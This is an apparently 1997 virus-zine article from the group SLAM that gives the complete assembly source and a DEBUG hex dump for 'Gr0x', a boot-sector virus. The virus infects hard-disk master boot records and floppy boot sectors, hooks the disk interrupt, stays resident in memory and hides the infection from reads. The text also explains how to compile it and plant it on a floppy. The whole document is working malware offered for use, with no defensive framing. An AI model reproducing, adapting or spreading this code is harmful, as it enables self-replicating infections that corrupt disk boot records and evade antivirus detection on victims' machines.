Copy Link
Add to Bookmark
Report
SLAM3.009: MBR/BS Infector ]Gr0x[ by DC [SLAM]
]Gr0x Virus[
This virus infect MBR of Hard Disk's and BS of 1.44 floppy disc's
The original MBR is on 0,0,2 and the original BS is on 0,1,14
Stealth BS on Read (redirect the read to original sector)
Stealth MBR on Write/Read/Verify...
I can't write a multipartite virus because the low space! only 512 bytes (size of 1 sector) :(
Compile with A86 v4.2 and put the virus in sector 1 head 0 track 0 of a 1.44 floppy disc! and original boot sector on 0,1,14
org 0h
jmp short grox ; Short Jump to start
db 3bh dup(0) ; Original Floppy Stuff
grox:
cli
xor ax,ax ; AX=DS=ES=0
mov ds,ax
mov es,ax
mov si,7c00h ; SI=7C00h
mov sp,si ; SP=SI
sti
mov ax,201h ; Read one sector
mov cx,1 ; to my buffer
mov dx,80h
mov bx,offset buffer+7c00h
int 13h
jc next1
cmp word ptr es:[bx+offset mark],'G[' ; Infected?
je next1 ; yepz, next
mov byte ptr cs:[disc][7c00h],0 ; It's a HARD Disk
mov ax,202h ; Write 2 Sectors
inc ah ; 1st sector = my virus
mov cx,1 ; 2nd sector = orig.
mov dx,80h
mov bx,7c00h
int 13h
mov byte ptr cs:[disc][7c00h],1 ; reset the mark
; to floppy disc.
next1:
xor si,si ; routine to make
xor si,400h ; resident. ANTi-TBAV
add si,013h
dec word ptr ds:[si]
mov ax,ds:[si]
shl ax,6 ; Get segment
mov es,ax ; ES=New Segment
mov ax,word ptr ds:[13h*4] ; Get the original
mov word ptr [i13][7c00h],ax ; Interrupt 13h
mov ax,word ptr ds:[13h*4][2]
mov word ptr [i13][7c02h],ax
mov word ptr ds:[13h*4],handler ; Put the new interrupt
mov word ptr ds:[13h*4][2],es ; handler
mov si,7c00h ; copy the virus to
mov cx,100h ; my segment
xor di,di
rep movsw
mov cx,0eh
mov dx,100h
cmp byte ptr cs:[disc][7c00h],1 ; it's a floppy???
je floppy
mov cx,2
mov dx,80h
floppy:
push es ; jump to the copy
push continue ; of my virus in memory
retf
continue:
xor ax,ax
mov es,ax
mov ax,201h ; Read original BS/MBR
mov bx,7c00h ; to 0000:7C000
call int13h
push es
push bx
retf ; Jump to original
; MBR/BS
handler:
cmp cx,1 ; Sector 1?
jne return
cmp dh,0 ; Head 0?
jne return
cmp dl,80h ; Hard Disk?
je mbr_stealth
cmp dl,1 ; floppy?
ja return
cmp ax,201h ; read one sector?
je floppy_infect
return:
db 0EAh ; fuck off!
i13 dw 0,0
mbr_stealth:
push cx
mov cl,2 ; redirect to original
int 13h ; MBR sector
pop cx
retf 2
floppy_infect:
call int13h
jc read_error ; error? fuck off!
pushf
push ax, bx, cx, si, di, ds, es
mov word ptr cs:[_es],es
mov word ptr cs:[_bx],bx
cmp word ptr es:[bx+offset mark],'G[' ; infected?
je floppy_stealth
mov ax,301h ; write original BS
mov cx,000eh ; on 0,1,14
mov dh,01h
call int13h
jc floppy_exit
mov byte ptr cs:[disc],1 ; floppy marker!
push es
pop ds
push cs
pop es
lea si,[bx+03h] ; copy the floppy stuff
mov di,03h ; to my virus!
mov cx,03bh
rep movsb
xor bx,bx ; write my virus...
mov ax,301h
mov cx,1
xor dh,dh
call int13h
floppy_stealth:
mov es,word ptr cs:[_es]
mov bx,word ptr cs:[_bx]
mov ax,201h ; read the original BS
mov cx,0eh
mov dh,01h
call int13h
floppy_exit:
pop es, ds, di, si, cx, bx, ax
popf
read_error:
retf 2 ; return far!
int13h:
pushf
call dword ptr cs:[i13]
ret
mark db '[Gr0x Virus] (c) 1997, Dark Chakal [SLAM]' ; my little credits...
disc db 1
_es dw ?
_bx dw ?
org 510
dw 0aa55h ; end of sector marker!
buffer: ; c00l buffer ;)
=====cut here=================================================================
N GROX.COM
E 0100 EB 3B 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 0110 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 0120 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 0130 00 00 00 00 00 00 00 00 00 00 00 00 00 FA 33 C0
E 0140 8E D8 8E C0 BE 00 7C 8B E6 FB B8 01 02 B9 01 00
E 0150 BA 80 00 BB 00 7E CD 13 72 25 26 81 BF 77 01 5B
E 0160 47 74 1C 2E C6 06 A0 7D 00 B8 02 02 FE C4 B9 01
E 0170 00 BA 80 00 BB 00 7C CD 13 2E C6 06 A0 7D 01 33
E 0180 F6 81 F6 00 04 83 C6 13 FF 0C 8B 04 C1 E0 06 8E
E 0190 C0 A1 4C 00 A3 F4 7C A1 4E 00 A3 F6 7C C7 06 4C
E 01A0 00 DA 00 8C 06 4E 00 BE 00 7C B9 00 01 33 FF F3
E 01B0 A5 B9 0E 00 BA 00 01 2E 80 3E A0 7D 01 74 06 B9
E 01C0 02 00 BA 80 00 06 68 CA 00 CB 33 C0 8E C0 B8 01
E 01D0 02 BB 00 7C E8 99 00 06 53 CB 83 F9 01 75 14 80
E 01E0 FE 00 75 0F 80 FA 80 74 0F 80 FA 01 77 05 3D 01
E 01F0 02 74 0E EA 00 00 00 00 51 B1 02 CD 13 59 CA 02
E 0200 00 E8 6C 00 72 67 9C 50 53 51 56 57 1E 06 2E 8C
E 0210 06 A1 01 2E 89 1E A3 01 26 81 BF 77 01 5B 47 74
E 0220 2F B8 01 03 B9 0E 00 B6 01 E8 44 00 72 37 2E C6
E 0230 06 A0 01 01 06 1F 0E 07 8D 77 03 BF 03 00 B9 3B
E 0240 00 F3 A4 33 DB B8 01 03 B9 01 00 32 F6 E8 20 00
E 0250 2E 8E 06 A1 01 2E 8B 1E A3 01 B8 01 02 B9 0E 00
E 0260 B6 01 E8 0B 00 07 1F 5F 5E 59 5B 58 9D CA 02 00
E 0270 9C 2E FF 1E F4 00 C3 5B 47 72 30 78 20 56 69 72
E 0280 75 73 5D 20 28 63 29 20 31 39 39 37 2C 20 44 61
E 0290 72 6B 20 43 68 61 6B 61 6C 20 5B 53 4C 41 4D 5D
E 02A0 01 00 00 00 00 90 90 90 90 90 90 90 90 90 90 90
E 02B0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
E 02C0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
E 02D0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
E 02E0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
E 02F0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 55 AA
RCX
0200
W
Q
=====cut here=================================================================
